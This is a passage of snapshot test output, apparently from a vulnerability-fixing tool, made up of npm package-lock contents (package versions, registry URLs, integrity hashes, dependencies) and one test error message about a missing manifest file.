"https://registry.npmjs.org/readable-stream/-/readable-stream-2.3.8.tgz", "integrity": "sha512-8p0AUk4XODgIewSi0l8Epjs+EVnWiK7NoDIEGU0HhE7+ZyY8D1IMY7odu5lRrFXGg71L15KG8QrPmum45RTtdA==", "requires": { "core-util-is": "~1.0.0", "inherits": "~2.0.3", "isarray": "~1.0.0", "process-nextick-args": "~2.0.0", "safe-buffer": "~5.1.1", "string_decoder": "~1.1.1", "util-deprecate": "~1.0.1" } }, "request": { "version": "2.88.2", "resolved": "https://registry.npmjs.org/request/-/request-2.88.2.tgz", "integrity": "sha512-MsvtOrfG9ZcrOwAW+Qi+F6HbD0CWXEh9ou77uOb7FM2WPhwT7smM833PzanhJLsgXjN89Ir6V2PczXNnMpwKhw==", "requires": { "aws-sign2": "~0.7.0", 
"aws4": "^1.8.0", "caseless": "~0.12.0", "combined-stream": "~1.0.6", "extend": "~3.0.2", "forever-agent": "~0.6.1", "form-data": "~2.3.2", "har-validator": "~5.1.3", "http-signature": "~1.2.0", "is-typedarray": "~1.0.0", "isstream": "~0.1.2", "json-stringify-safe": "~5.0.1", "mime-types": "~2.1.19", "oauth-sign": "~0.9.0", "performance-now": "^2.1.0", "qs": "~6.5.2", "safe-buffer": "^5.1.2", "tough-cookie": "~2.5.0", "tunnel-agent": "^0.6.0", "uuid": "^3.3.2" } }, "resolve": { "version": "1.22.8", "resolved": "https://registry.npmjs.org/resolve/-/resolve-1.22.8.tgz", "integrity": "sha512-oKWePCxqpd6FlLvGV1VU0x7bkPmmCNolxzjMf4NczoDnQcIWrAF+cPtZn5i6n+RfD2d9i0tzpKnG6Yk168yIyw==", "requires": { "is-core-module": "^2.13.0", "path-parse": "^1.0.7", "supports-preserve-symlinks-flag": "^1.0.0" } }, "retry": { "version": "0.6.1", "resolved": "https://registry.npmjs.org/retry/-/retry-0.6.1.tgz", "integrity": "sha512-txv1qsctZq8ei9J/uCXgaKKFPjlBB0H2hvtnzw9rjKWFNUFtKh59WprXxpAeAey3/QeWwHdxMFqStPaOAgy+dA==" }, "rimraf": { "version": "2.7.1", "resolved": "https://registry.npmjs.org/rimraf/-/rimraf-2.7.1.tgz", "integrity": "sha512-uWjbaKIK3T1OSVptzX7Nl6PvQ3qAGtKEtVRjRuazjfL3Bx5eI409VZSqgND+4UNnmzLVdPj9FqFJNPqBZFve4w==", "requires": { "glob": "^7.1.3" } }, "safe-buffer": { "version": "5.1.2", "resolved": "https://registry.npmjs.org/safe-buffer/-/safe-buffer-5.1.2.tgz", "integrity": "sha512-Gd2UZBJDkXlY7GbJxfsE8/nvKkUEU1G38c1siN6QP6a9PT9MmHB8GnpscSmMJSoF8LOIrt8ud/wPtojys4G6+g==" }, "safer-buffer": { "version": "2.1.2", "resolved": "https://registry.npmjs.org/safer-buffer/-/safer-buffer-2.1.2.tgz", "integrity": "sha512-YZo3K82SD7Riyi0E1EQPojLz7kpepnSQI9IyPbHHg1XXXevb5dJI7tpyN2ADxGcQbHG7vcyRHk0cbwqcQriUtg==" }, "semver": { "version": "4.3.6", "resolved": "https://registry.npmjs.org/semver/-/semver-4.3.6.tgz", "integrity": "sha512-IrpJ+yoG4EOH8DFWuVg+8H1kW1Oaof0Wxe7cPcXW3x9BjkN/eVo54F15LyqemnDIUYskQWr9qvl/RihmSy6+xQ==" }, "set-blocking": { "version": "2.0.0", "resolved": 
"https://registry.npmjs.org/set-blocking/-/set-blocking-2.0.0.tgz", "integrity": "sha512-KiKBS8AnWGEyLzofFfmvKwpdPzqiy16LvQfK3yv/fVH7Bj13/wl3JSR1J+rfgRE9q7xUJK4qvgS8raSOeLUehw==", "optional": true }, "signal-exit": { "version": "4.1.0", "resolved": "https://registry.npmjs.org/signal-exit/-/signal-exit-4.1.0.tgz", "integrity": "sha512-bzyZ1e88w9O1iNJbKnOlvYTrWPDl46O1bG0D3XInv+9tkPrxrN8jUUTiFlDkkmKWgn1M6CfIA13SuGqOa9Korw==", "optional": true }, "slide": { "version": "1.1.6", "resolved": "https://registry.npmjs.org/slide/-/slide-1.1.6.tgz", "integrity": "sha512-NwrtjCg+lZoqhFU8fOwl4ay2ei8PaqCBOUV3/ektPY9trO1yQ1oXEfmHAhKArUVUr/hOHvy5f6AdP17dCM0zMw==" }, "spdx-correct": { "version": "3.2.0", "resolved": "https://registry.npmjs.org/spdx-correct/-/spdx-correct-3.2.0.tgz", "integrity": "sha512-kN9dJbvnySHULIluDHy32WHRUu3Og7B9sbY7tsFLctQkIqnMh3hErYgdMjTYuqmcXX+lK5T1lnUt3G7zNswmZA==", "requires": { "spdx-expression-parse": "^3.0.0", "spdx-license-ids": "^3.0.0" } }, "spdx-exceptions": { "version": "2.4.0", "resolved": "https://registry.npmjs.org/spdx-exceptions/-/spdx-exceptions-2.4.0.tgz", "integrity": "sha512-hcjppoJ68fhxA/cjbN4T8N6uCUejN8yFw69ttpqtBeCbF3u13n7mb31NB9jKwGTTWWnt9IbRA/mf1FprYS8wfw==" }, "spdx-expression-parse": { "version": "3.0.1", "resolved": "https://registry.npmjs.org/spdx-expression-parse/-/spdx-expression-parse-3.0.1.tgz", "integrity": "sha512-cbqHunsQWnJNE6KhVSMsMeH5H/L9EpymbzqTQ3uLwNCLZ1Q481oWaofqH7nO6V07xlXwY6PhQdQ2IedWx/ZK4Q==", "requires": { "spdx-exceptions": "^2.1.0", "spdx-license-ids": "^3.0.0" } }, "spdx-license-ids": { "version": "3.0.17", "resolved": "https://registry.npmjs.org/spdx-license-ids/-/spdx-license-ids-3.0.17.tgz", "integrity": "sha512-sh8PWc/ftMqAAdFiBu6Fy6JUOYjqDJBJvIhpfDMyHrr0Rbp5liZqd4TjtQ/RgfLjKFZb+LMx5hpml5qOWy0qvg==" }, "sshpk": { "version": "1.18.0", "resolved": "https://registry.npmjs.org/sshpk/-/sshpk-1.18.0.tgz", "integrity": 
"sha512-2p2KJZTSqQ/I3+HX42EpYOa2l3f8Erv8MWKsy2I9uf4wA7yFIkXRffYdsx86y6z4vHtV8u7g+pPlr8/4ouAxsQ==", "requires": { "asn1": "~0.2.3", "assert-plus": "^1.0.0", "bcrypt-pbkdf": "^1.0.0", "dashdash": "^1.12.0", "ecc-jsbn": "~0.1.1", "getpass": "^0.1.1", "jsbn": "~0.1.0", "safer-buffer": "^2.0.2", "tweetnacl": "~0.14.0" } }, "string_decoder": { "version": "1.1.1", "resolved": "https://registry.npmjs.org/string_decoder/-/string_decoder-1.1.1.tgz", "integrity": "sha512-n/ShnvDi6FHbbVfviro+WojiFzv+s8MPMHBczVePfUpDJLwoLT0ht1l4YwBCbi8pJAveEEdnkHyPyTP/mzRfwg==", "requires": { "safe-buffer": "~5.1.0" } }, "string-width": { "version": "4.2.3", "resolved": "https://registry.npmjs.org/string-width/-/string-width-4.2.3.tgz", "integrity": "sha512-wKyQRQpjJ0sIp62ErSZdGsjMJWsap5oRNihHhu6G7JVO/9jIB6UyevL+tXuOqrng8j/cxKTWyWUwvSTriiZz/g==", "optional": true, "requires": { "emoji-regex": "^8.0.0", "is-fullwidth-code-point": "^3.0.0", "strip-ansi": "^6.0.1" } }, "strip-ansi": { "version": "6.0.1", "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-6.0.1.tgz", "integrity": "sha512-Y38VPSHcqkFrCpFnQ9vuSXmquuv5oXOKpGeT6aGrr3o3Gc9AlVa6JBfUSOCnbxGGZF+/0ooI7KrPuUSztUdU5A==", "optional": true, "requires": { "ansi-regex": "^5.0.1" } }, "supports-preserve-symlinks-flag": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/supports-preserve-symlinks-flag/-/supports-preserve-symlinks-flag-1.0.0.tgz", "integrity": "sha512-ot0WnXS9fgdkgIcePe6RHNk1WA8+muPa6cSjeR3V8K27q9BB1rTE3R1p7Hv0z1ZyAc8s6Vvv8DIyWf681MAt0w==" }, "tough-cookie": { "version": "2.5.0", "resolved": "https://registry.npmjs.org/tough-cookie/-/tough-cookie-2.5.0.tgz", "integrity": "sha512-nlLsUzgm1kfLXSXfRZMc1KLAugd4hqJHDTvc2hDIwS3mZAfMEuMbc03SujMF+GEcpaX/qboeycw6iO8JwVv2+g==", "requires": { "psl": "^1.1.28", "punycode": "^2.1.1" } }, "tunnel-agent": { "version": "0.6.0", "resolved": "https://registry.npmjs.org/tunnel-agent/-/tunnel-agent-0.6.0.tgz", "integrity": 
"sha512-McnNiV1l8RYeY8tBgEpuodCC1mLUdbSN+CYBL7kJsJNInOP8UjDDEwdk6Mw60vdLLrr5NHKZhMAOSrR2NZuQ+w==", "requires": { "safe-buffer": "^5.0.1" } }, "tweetnacl": { "version": "0.14.5", "resolved": "https://registry.npmjs.org/tweetnacl/-/tweetnacl-0.14.5.tgz", "integrity": "sha512-KXXFFdAbFXY4geFIwoyNK+f5Z1b7swfXABfL7HXCmoIWMKU3dmS26672A4EeQtDzLKy7SXmfBu51JolvEKwtGA==" }, "typedarray": { "version": "0.0.6", "resolved": "https://registry.npmjs.org/typedarray/-/typedarray-0.0.6.tgz", "integrity": "sha512-/aCDEGatGvZ2BIk+HmLf4ifCJFwvKFNb9/JeZPMulfgFracn9QFcAf5GO8B/mweUjSoblS5In0cWhqpfs/5PQA==" }, "uri-js": { "version": "4.4.1", "resolved": "https://registry.npmjs.org/uri-js/-/uri-js-4.4.1.tgz", "integrity": "sha512-7rKUyy33Q1yc98pQ1DAmLtwX109F7TIfWlW1Ydo8Wl1ii1SeHieeh0HHfPeL2fMXK6z0s8ecKs9frCuLJvndBg==", "requires": { "punycode": "^2.1.0" } }, "util-deprecate": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/util-deprecate/-/util-deprecate-1.0.2.tgz", "integrity": "sha512-EPD5q1uXyFxJpCrLnCc1nHnq3gOa6DZBocAIiI2TaSCA7VCJ1UJDMagCzIkXNsUYfD1daK//LTEQ8xiIbrHtcw==" }, "uuid": { "version": "3.4.0", "resolved": "https://registry.npmjs.org/uuid/-/uuid-3.4.0.tgz", "integrity": "sha512-HjSDRw6gZE5JMggctHBcjVak08+KEVhSIiDzFnT9S9aegmp85S/bReBVTb4QTFaRNptJ9kuYaNhnbNEOkbKb/A==" }, "validate-npm-package-license": { "version": "3.0.4", "resolved": "https://registry.npmjs.org/validate-npm-package-license/-/validate-npm-package-license-3.0.4.tgz", "integrity": "sha512-DpKm2Ui/xN7/HQKCtpZxoRWBhZ9Z0kqtygG8XCgNQ8ZlDnxuQmWhj566j8fN4Cu3/JmbhsDo7fcAJq4s9h27Ew==", "requires": { "spdx-correct": "^3.0.0", "spdx-expression-parse": "^3.0.0" } }, "verror": { "version": "1.10.0", "resolved": "https://registry.npmjs.org/verror/-/verror-1.10.0.tgz", "integrity": "sha512-ZZKSmDAEFOijERBLkmYfJ+vmk3w+7hOLYDNkRCuRuMJGEmqYNCNLyBBFwWKVMhfwaEF3WOd0Zlw86U/WC/+nYw==", "requires": { "assert-plus": "^1.0.0", "core-util-is": "1.0.2", "extsprintf": "^1.2.0" }, "dependencies": { "core-util-is": { "version": 
"1.0.2", "resolved": "https://registry.npmjs.org/core-util-is/-/core-util-is-1.0.2.tgz", "integrity": "sha512-3lqz5YjWTYnW6dlDa5TLaTCcShfar1e40rmcJVwCBJC6mWlFuj0eCHIElmG1g5kyuJ/GD+8Wn4FFCcz4gJPfaQ==" } } }, "wide-align": { "version": "1.1.5", "resolved": "https://registry.npmjs.org/wide-align/-/wide-align-1.1.5.tgz", "integrity": "sha512-eDMORYaPNZ4sQIuuYPDHdQvf4gyCF9rEEV/yPxGfwPkRodwEgiMUUXTx/dex+Me0wxx53S+NgUHaP7y3MGlDmg==", "optional": true, "requires": { "string-width": "^1.0.2 || 2 || 3 || 4" } }, "wrappy": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/wrappy/-/wrappy-1.0.2.tgz", "integrity": "sha512-l4Sp/DRseor9wL6EvV2+TuQn63dMkPjZ/sp9XkghTEbV9KlPS1xUsZ3u7/IQO4wxtcFB4bgpQPRcR3QCvezPcQ==" } } } --- [TestCommand/errors_when_relax_used_without_manifest - 1] --- [TestCommand/errors_when_relax_used_without_manifest - 2] relax strategy requires manifest file --- [TestCommand/errors_when_relax_used_without_manifest - 3] { "name": "osv-fix", "version": "1.0.0", "lockfileVersion": 2, "requires": true, "packages": { "": { "name": "osv-fix", "version": "1.0.0", "license": "ISC", "dependencies": { "npm-registry-client": "^6.2.0" } }, "node_modules/ajv": { "version": "6.12.6", "resolved": "https://registry.npmjs.org/ajv/-/ajv-6.12.6.tgz", "integrity": "sha512-j3fVLgvTo527anyYyJOGTYJbG+vnnQYvE0m5mmkc1TK+nxAppkCLMIL0aZ4dblVCNoGShhm+kzE4ZUykBoMg4g==", "dependencies": { "fast-deep-equal": "^3.1.1", "fast-json-stable-stringify": "^2.0.0", "json-schema-traverse": "^0.4.1", "uri-js": "^4.2.2" }, "funding": { "type": "github", "url": "https://github.com/sponsors/epoberezkin" } }, "node_modules/ansi-regex": { "version": "5.0.1", "resolved": "https://registry.npmjs.org/ansi-regex/-/ansi-regex-5.0.1.tgz", "integrity": "sha512-quJQXlTSUGL2LH9SUXo8VwsY4soanhgo6LNSm84E1LBcE8s3O0wpdiRzyR9z/ZZJMlMWv37qOOb9pdJlMUEKFQ==", "optional": true, "engines": { "node": ">=8" } }, "node_modules/aproba": { "version": "2.0.0", "resolved": 
"https://registry.npmjs.org/aproba/-/aproba-2.0.0.tgz", "integrity": "sha512-lYe4Gx7QT+MKGbDsA+Z+he/Wtef0BiwDOlK/XkBrdfsh9J/jPPXbX0tE9x9cl27Tmu5gg3QUbUrQYa/y+KOHPQ==", "optional": true }, "node_modules/are-we-there-yet": { "version": "4.0.2", "resolved": "https://registry.npmjs.org/are-we-there-yet/-/are-we-there-yet-4.0.2.tgz", "integrity": "sha512-ncSWAawFhKMJDTdoAeOV+jyW1VCMj5QIAwULIBV0SSR7B/RLPPEQiknKcg/RIIZlUQrxELpsxMiTUoAQ4sIUyg==", "optional": true, "engines": { "node": "^14.17.0 || ^16.13.0 || >=18.0.0" } }, "node_modules/asn1": { "version": "0.2.6", "resolved": "https://registry.npmjs.org/asn1/-/asn1-0.2.6.tgz", "integrity": "sha512-ix/FxPn0MDjeyJ7i/yoHGFt/EX6LyNbxSEhPPXODPL+KB0VPk86UYfL0lMdy+KCnv+fmvIzySwaK5COwqVbWTQ==", "dependencies": { "safer-buffer": "~2.1.0" } }, "node_modules/assert-plus": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/assert-plus/-/assert-plus-1.0.0.tgz", "integrity": "sha512-NfJ4UzBCcQGLDlQq7nHxH+tv3kyZ0hHQqF5BO6J7tNJeP5do1llPr8dZ8zHonfhAu0PHAdMkSo+8o0wxg9lZWw==", "engines": { "node": ">=0.8" } }, "node_modules/asynckit": { "version": "0.4.0", "resolved": "https://registry.npmjs.org/asynckit/-/asynckit-0.4.0.tgz", "integrity": "sha512-Oei9OH4tRh0YqU3GxhX79dM/mwVgvbZJaSNaRk+bshkj0S5cfHcgYakreBjrHwatXKbz+IoIdYLxrKim2MjW0Q==" }, "node_modules/aws-sign2": { "version": "0.7.0", "resolved": "https://registry.npmjs.org/aws-sign2/-/aws-sign2-0.7.0.tgz", "integrity": "sha512-08kcGqnYf/YmjoRhfxyu+CLxBjUtHLXLXX/vUfx9l2LYzG3c1m61nrpyFUZI6zeS+Li/wWMMidD9KgrqtGq3mA==", "engines": { "node": "*" } }, "node_modules/aws4": { "version": "1.12.0", "resolved": "https://registry.npmjs.org/aws4/-/aws4-1.12.0.tgz", "integrity": "sha512-NmWvPnx0F1SfrQbYwOi7OeaNGokp9XhzNioJ/CSBs8Qa4vxug81mhJEAVZwxXuBmYB5KDRfMq/F3RR0BIU7sWg==" }, "node_modules/balanced-match": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/balanced-match/-/balanced-match-1.0.2.tgz", "integrity": 
"sha512-3oSeUO0TMV67hN1AmbXsK4yaqU7tjiHlbxRDZOpH0KW9+CeX4bRAaX0Anxt0tx2MrpRpWwQaPwIlISEJhYU5Pw==" }, "node_modules/bcrypt-pbkdf": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/bcrypt-pbkdf/-/bcrypt-pbkdf-1.0.2.tgz", "integrity": "sha512-qeFIXtP4MSoi6NLqO12WfqARWWuCKi2Rn/9hJLEmtB5yTNr9DqFWkJRCf2qShWzPeAMRnOgCrq0sg/KLv5ES9w==", "dependencies": { "tweetnacl": "^0.14.3" } }, "node_modules/brace-expansion": { "version": "1.1.11", "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-1.1.11.tgz", "integrity": "sha512-iCuPHDFgrHX7H2vEI/5xpz07zSHB00TpugqhmYtVmMO6518mCuRMoOYFldEBl0g187ufozdaHgWKcYFb61qGiA==", "dependencies": { "balanced-match": "^1.0.0", "concat-map": "0.0.1" } }, "node_modules/caseless": { "version": "0.12.0", "resolved": "https://registry.npmjs.org/caseless/-/caseless-0.12.0.tgz", "integrity": "sha512-4tYFyifaFfGacoiObjJegolkwSU4xQNGbVgUiNYVUxbQ2x2lUsFvY4hVgVzGiIe6WLOPqycWXA40l+PWsxthUw==" }, "node_modules/chownr": { "version": "0.0.2", "resolved": "https://registry.npmjs.org/chownr/-/chownr-0.0.2.tgz", "integrity": "sha512-4sa7ZJ+/DavveVRsu49tUbYvLn5cS75w8gLQr14jXlFxSNbuoY7G6gPjcVfgdQ+c4BW02b0hXV5nOXYFD7Fmpw==" }, "node_modules/color-support": { "version": "1.1.3", "resolved": "https://registry.npmjs.org/color-support/-/color-support-1.1.3.tgz", "integrity": "sha512-qiBjkpbMLO/HL68y+lh4q0/O1MZFj2RX6X/KmMa3+gJD3z+WwI1ZzDHysvqHGS3mP6mznPckpXmw1nI9cJjyRg==", "optional": true, "bin": { "color-support": "bin.js" } }, "node_modules/combined-stream": { "version": "1.0.8", "resolved": "https://registry.npmjs.org/combined-stream/-/combined-stream-1.0.8.tgz", "integrity": "sha512-FQN4MRfuJeHf7cBbBMJFXhKSDq+2kAArBlmRBvcvFE5BB1HZKXtSFASDhdlz9zOYwxh8lDdnvmMOe/+5cdoEdg==", "dependencies": { "delayed-stream": "~1.0.0" }, "engines": { "node": ">= 0.8" } }, "node_modules/concat-map": { "version": "0.0.1", "resolved": "https://registry.npmjs.org/concat-map/-/concat-map-0.0.1.tgz", "integrity": 
"sha512-/Srv4dswyQNBfohGpz9o6Yb3Gz3SrUDqBH5rTuhGR7ahtlbYKnVxw2bCFMRljaA7EXHaXZ8wsHdodFvbkhKmqg==" }, "node_modules/concat-stream": { "version": "1.5.0", "resolved": "https://registry.npmjs.org/concat-stream/-/concat-stream-1.5.0.tgz", "integrity": "sha512-litEocitzYgqQ0IPaoLw+tCHcVcJJYW05+SAhH+LS9qutSC7iuejvawts3cUYQycZbRbLsjG8mCJLQi2KX5kEw==", "engines": [ "node >= 0.8" ], "dependencies": { "inherits": "~2.0.1", "readable-stream": "~2.0.0", "typedarray": "~0.0.5" } }, "node_modules/console-control-strings": { "version": "1.1.0", "resolved": "https://registry.npmjs.org/console-control-strings/-/console-control-strings-1.1.0.tgz", "integrity": "sha512-ty/fTekppD2fIwRvnZAVdeOiGd1c7YXEixbgJTNzqcxJWKQnjJ/V1bNEEE6hygpM3WjwHFUVK6HTjWSzV4a8sQ==", "optional": true }, "node_modules/core-util-is": { "version": "1.0.3", "resolved": "https://registry.npmjs.org/core-util-is/-/core-util-is-1.0.3.tgz", "integrity": "sha512-ZQBvi1DcpJ4GDqanjucZ2Hj3wEO5pZDS89BWbkcrvdxksJorwUDDZamX9ldFkp9aw2lmBDLgkObEA4DWNJ9FYQ==" }, "node_modules/dashdash": { "version": "1.14.1", "resolved": "https://registry.npmjs.org/dashdash/-/dashdash-1.14.1.tgz", "integrity": "sha512-jRFi8UDGo6j+odZiEpjazZaWqEal3w/basFjQHQEwVtZJGDpxbH1MeYluwCS8Xq5wmLJooDlMgvVarmWfGM44g==", "dependencies": { "assert-plus": "^1.0.0" }, "engines": { "node": ">=0.10" } }, "node_modules/delayed-stream": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/delayed-stream/-/delayed-stream-1.0.0.tgz", "integrity": "sha512-ZySD7Nf91aLB0RxL4KGrKHBXl7Eds1DAmEdcoVawXnLD7SDhpNgtuII2aAkg7a7QS41jxPSZ17p4VdGnMHk3MQ==", "engines": { "node": ">=0.4.0" } }, "node_modules/ecc-jsbn": { "version": "0.1.2", "resolved": "https://registry.npmjs.org/ecc-jsbn/-/ecc-jsbn-0.1.2.tgz", "integrity": "sha512-eh9O+hwRHNbG4BLTjEl3nw044CkGm5X6LoaCf7LPp7UU8Qrt47JYNi6nPX8xjW97TKGKm1ouctg0QSpZe9qrnw==", "dependencies": { "jsbn": "~0.1.0", "safer-buffer": "^2.1.0" } }, "node_modules/emoji-regex": { "version": "8.0.0", "resolved": 
"https://registry.npmjs.org/emoji-regex/-/emoji-regex-8.0.0.tgz", "integrity": "sha512-MSjYzcWNOA0ewAHpz0MxpYFvwg6yjy1NG3xteoqz644VCo/RPgnr1/GGt+ic3iJTzQ8Eu3TdM14SawnVUmGE6A==", "optional": true }, "node_modules/extend": { "version": "3.0.2", "resolved": "https://registry.npmjs.org/extend/-/extend-3.0.2.tgz", "integrity": "sha512-fjquC59cD7CyW6urNXK0FBufkZcoiGG80wTuPujX590cB5Ttln20E2UB4S/WARVqhXffZl2LNgS+gQdPIIim/g==" }, "node_modules/extsprintf": { "version": "1.3.0", "resolved": "https://registry.npmjs.org/extsprintf/-/extsprintf-1.3.0.tgz", "integrity": "sha512-11Ndz7Nv+mvAC1j0ktTa7fAb0vLyGGX+rMHNBYQviQDGU0Hw7lhctJANqbPhu9nV9/izT/IntTgZ7Im/9LJs9g==", "engines": [ "node >=0.6.0" ] }, "node_modules/fast-deep-equal": { "version": "3.1.3", "resolved": "https://registry.npmjs.org/fast-deep-equal/-/fast-deep-equal-3.1.3.tgz", "integrity": "sha512-f3qQ9oQy9j2AhBe/H9VC91wLmKBCCU/gDOnKNAYG5hswO7BLKj09Hc5HYNz9cGI++xlpDCIgDaitVs03ATR84Q==" }, "node_modules/fast-json-stable-stringify": { "version": "2.1.0", "resolved": "https://registry.npmjs.org/fast-json-stable-stringify/-/fast-json-stable-stringify-2.1.0.tgz", "integrity": "sha512-lhd/wF+Lk98HZoTCtlVraHtfh5XYijIjalXck7saUtuanSDyLMxnHhSXEDJqHxD7msR8D0uCmqlkwjCV8xvwHw==" }, "node_modules/forever-agent": { "version": "0.6.1", "resolved": "https://registry.npmjs.org/forever-agent/-/forever-agent-0.6.1.tgz", "integrity": "sha512-j0KLYPhm6zeac4lz3oJ3o65qvgQCcPubiyotZrXqEaG4hNagNYO8qdlUrX5vwqv9ohqeT/Z3j6+yW067yWWdUw==", "engines": { "node": "*" } }, "node_modules/form-data": { "version": "2.3.3", "resolved": "https://registry.npmjs.org/form-data/-/form-data-2.3.3.tgz", "integrity": "sha512-1lLKB2Mu3aGP1Q/2eCOx0fNbRMe7XdwktwOruhfqqd0rIJWwN4Dh+E3hrPSlDCXnSR7UtZ1N38rVXm+6+MEhJQ==", "dependencies": { "asynckit": "^0.4.0", "combined-stream": "^1.0.6", "mime-types": "^2.1.12" }, "engines": { "node": ">= 0.12" } }, "node_modules/fs.realpath": { "version": "1.0.0", "resolved": 
"https://registry.npmjs.org/fs.realpath/-/fs.realpath-1.0.0.tgz", "integrity": "sha512-OO0pH2lK6a0hZnAdau5ItzHPI6pUlvI7jMVnxUQRtw4owF2wk8lOSabtGDCTP4Ggrg2MbGnWO9X8K1t4+fGMDw==" }, "node_modules/function-bind": { "version": "1.1.2", "resolved": "https://registry.npmjs.org/function-bind/-/function-bind-1.1.2.tgz", "integrity": "sha512-7XHNxH7qX9xG5mIwxkhumTox/MIRNcOgDrxWsMt2pAr23WHp6MrRlN7FBSFpCpr+oVO0F744iUgR82nJMfG2SA==", "funding": { "url": "https://github.com/sponsors/ljharb" } }, "node_modules/gauge": { "version": "5.0.1", "resolved": "https://registry.npmjs.org/gauge/-/gauge-5.0.1.tgz", "integrity": "sha512-CmykPMJGuNan/3S4kZOpvvPYSNqSHANiWnh9XcMU2pSjtBfF0XzZ2p1bFAxTbnFxyBuPxQYHhzwaoOmUdqzvxQ==", "optional": true, "dependencies": { "aproba": "^1.0.3 || ^2.0.0", "color-support": "^1.1.3", "console-control-strings": "^1.1.0", "has-unicode": "^2.0.1", "signal-exit": "^4.0.1", "string-width": "^4.2.3", "strip-ansi": "^6.0.1", "wide-align": "^1.1.5" }, "engines": { "node": "^14.17.0 || ^16.13.0 || >=18.0.0" } }, "node_modules/getpass": { "version": "0.1.7", "resolved": "https://registry.npmjs.org/getpass/-/getpass-0.1.7.tgz", "integrity": "sha512-0fzj9JxOLfJ+XGLhR8ze3unN0KZCgZwiSSDz168VERjK8Wl8kVSdcu2kspd4s4wtAa1y/qrVRiAA0WclVsu0ng==", "dependencies": { "assert-plus": "^1.0.0" } }, "node_modules/glob": { "version": "7.2.3", "resolved": "https://registry.npmjs.org/glob/-/glob-7.2.3.tgz", "integrity": "sha512-nFR0zLpU2YCaRxwoCJvL6UvCH2JFyFVIvwTLsIf21AuHlMskA1hhTdk+LlYJtOlYt9v6dvszD2BGRqBL+iQK9Q==", "dependencies": { "fs.realpath": "^1.0.0", "inflight": "^1.0.4", "inherits": "2", "minimatch": "^3.1.1", "once": "^1.3.0", "path-is-absolute": "^1.0.0" }, "engines": { "node": "*" }, "funding": { "url": "https://github.com/sponsors/isaacs" } }, "node_modules/graceful-fs": { "version": "3.0.12", "resolved": "https://registry.npmjs.org/graceful-fs/-/graceful-fs-3.0.12.tgz", "integrity": 
"sha512-J55gaCS4iTTJfTXIxSVw3EMQckcqkpdRv3IR7gu6sq0+tbC363Zx6KH/SEwXASK9JRbhyZmVjJEVJIOxYsB3Qg==", "dependencies": { "natives": "^1.1.3" }, "engines": { "node": ">=0.4.0" } }, "node_modules/har-schema": { "version": "2.0.0", "resolved": "https://registry.npmjs.org/har-schema/-/har-schema-2.0.0.tgz", "integrity": "sha512-Oqluz6zhGX8cyRaTQlFMPw80bSJVG2x/cFb8ZPhUILGgHka9SsokCCOQgpveePerqidZOrT14ipqfJb7ILcW5Q==", "engines": { "node": ">=4" } }, "node_modules/har-validator": { "version": "5.1.5", "resolved": "https://registry.npmjs.org/har-validator/-/har-validator-5.1.5.tgz", "integrity": "sha512-nmT2T0lljbxdQZfspsno9hgrG3Uir6Ks5afism62poxqBM6sDnMEuPmzTq8XN0OEwqKLLdh1jQI3qyE66Nzb3w==", "deprecated": "this library is no longer supported", "dependencies": { "ajv": "^6.12.3", "har-schema": "^2.0.0" }, "engines": { "node": ">=6" } }, "node_modules/has-unicode": { "version": "2.0.1", "resolved": "https://registry.npmjs.org/has-unicode/-/has-unicode-2.0.1.tgz", "integrity": "sha512-8Rf9Y83NBReMnx0gFzA8JImQACstCYWUplepDa9xprwwtmgEZUF0h/i5xSA625zB/I37EtrswSST6OXxwaaIJQ==", "optional": true }, "node_modules/hasown": { "version": "2.0.1", "resolved": "https://registry.npmjs.org/hasown/-/hasown-2.0.1.tgz", "integrity": "sha512-1/th4MHjnwncwXsIW6QMzlvYL9kG5e/CpVvLRZe4XPa8TOUNbCELqmvhDmnkNsAjwaG4+I8gJJL0JBvTTLO9qA==", "dependencies": { "function-bind": "^1.1.2" }, "engines": { "node": ">= 0.4" } }, "node_modules/hosted-git-info": { "version": "2.1.4", "resolved": "https://registry.npmjs.org/hosted-git-info/-/hosted-git-info-2.1.4.tgz", "integrity": "sha512-4R9eDu2ytsDMdo7nQXHrpK1347y3nu/ThXZ4tjpkUTsZnzoIIQprnPOM65c20oInjmocLuEGBIbPsesYCqibag==" }, "node_modules/http-signature": { "version": "1.2.0", "resolved": "https://registry.npmjs.org/http-signature/-/http-signature-1.2.0.tgz", "integrity": "sha512-CAbnr6Rz4CYQkLYUtSNXxQPUH2gK8f3iWexVlsnMeD+GjlsQ0Xsy1cOX+mN3dtxYomRy21CiOzU8Uhw6OwncEQ==", "dependencies": { "assert-plus": "^1.0.0", "jsprim": "^1.2.2", "sshpk": "^1.7.0" }, 
"engines": { "node": ">=0.8", "npm": ">=1.3.7" } }, "node_modules/inflight": { "version": "1.0.6", "resolved": "https://registry.npmjs.org/inflight/-/inflight-1.0.6.tgz", "integrity": "sha512-k92I/b08q4wvFscXCLvqfsHCrjrF7yiXsQuIVvVE7N82W3+aqpzuUdBbfhWcy/FZR3/4IgflMgKLOsvPDrGCJA==", "dependencies": { "once": "^1.3.0", "wrappy": "1" } }, "node_modules/inherits": { "version": "2.0.4", "resolved": "https://registry.npmjs.org/inherits/-/inherits-2.0.4.tgz", "integrity": "sha512-k/vGaX4/Yla3WzyMCvTQOXYeIHvqOKtnqBduzTHpzpQZzAskKMhZ2K+EnBiSM9zGSoIFeMpXKxa4dYeZIQqewQ==" }, "node_modules/is-core-module": { "version": "2.13.1", "resolved": "https://registry.npmjs.org/is-core-module/-/is-core-module-2.13.1.tgz", "integrity": "sha512-hHrIjvZsftOsvKSn2TRYl63zvxsgE0K+0mYMoH6gD4omR5IWB2KynivBQczo3+wF1cCkjzvptnI9Q0sPU66ilw==", "dependencies": { "hasown": "^2.0.0" }, "funding": { "url": "https://github.com/sponsors/ljharb" } }, "node_modules/is-fullwidth-code-point": { "version": "3.0.0", "resolved": "https://registry.npmjs.org/is-fullwidth-code-point/-/is-fullwidth-code-point-3.0.0.tgz", "integrity": "sha512-zymm5+u+sCsSWyD9qNaejV3DFvhCKclKdizYaJUuHA83RLjb7nSuGnddCHGv0hk+KY7BMAlsWeK4Ueg6EV6XQg==", "optional": true, "engines": { "node": ">=8" } 